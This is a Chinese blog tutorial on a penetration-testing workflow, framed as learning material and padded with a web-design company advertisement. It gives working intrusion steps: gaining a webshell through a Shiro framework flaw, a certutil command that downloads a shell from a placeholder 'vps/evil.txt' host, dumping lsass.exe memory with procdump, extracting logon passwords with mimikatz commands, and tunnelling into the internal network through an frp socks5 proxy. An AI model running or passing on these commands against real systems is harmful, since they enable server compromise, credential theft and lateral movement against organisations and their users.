如何理解渗透测试流程:getshell,内存提取密码,内网渗透
本篇内容介绍了“如何理解渗透测试流程:getshell,内存提取密码,内网渗透”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!
成都创新互联公司-专业网站定制、快速模板网站建设、高性价比南皮网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式南皮网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖南皮地区。费用合理售后完善,十多年实体公司更值得信赖。
思路:
通过shiro框架漏洞拿到webshell——上传相关工具procdump.exe读取内存并导出为dmp文件——使用mimikatz进行密码破解——用frp进行反向代理——使用破解的账户密码登录服务器。
测试过程:
通过shiro工具进行测试:关于shiro和工具参考:https://www.cnblogs.com/xiaozi/p/13239046.html
获取webshell,有些时候如果获取不到可以通过远程下载的办法下载shell:certutil -urlcache -split -f http://vps/evil.txt test.jsp
上传procdump.exe
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
执行命令:procdump64.exe -accepteula -ma lsass.exe
说明:lsass.exe是windows系统的一个重要进程,里面存着(登录过的)系统账户和密码
把dmp文件下载下来,使用mimikatz进行密码破解:
先导入dmp文件,命令:sekurlsa::minidump lass*.dmp
读取账户密码,命令:sekurlsa::logonpasswords
然后搭建frp梯子:
实战还是多用用plugin = socks5,这个参数可以帮你进行全局代理。
用拿到的账号密码登录服务器:
“如何理解渗透测试流程:getshell,内存提取密码,内网渗透”的内容就介绍到这里了,感谢大家的阅读。如果想了解更多行业相关的知识可以关注创新互联网站,小编将为大家输出更多高质量的实用文章!
当前名称:如何理解渗透测试流程:getshell,内存提取密码,内网渗透
转载来于:http://scjbc.cn/article/psjish.html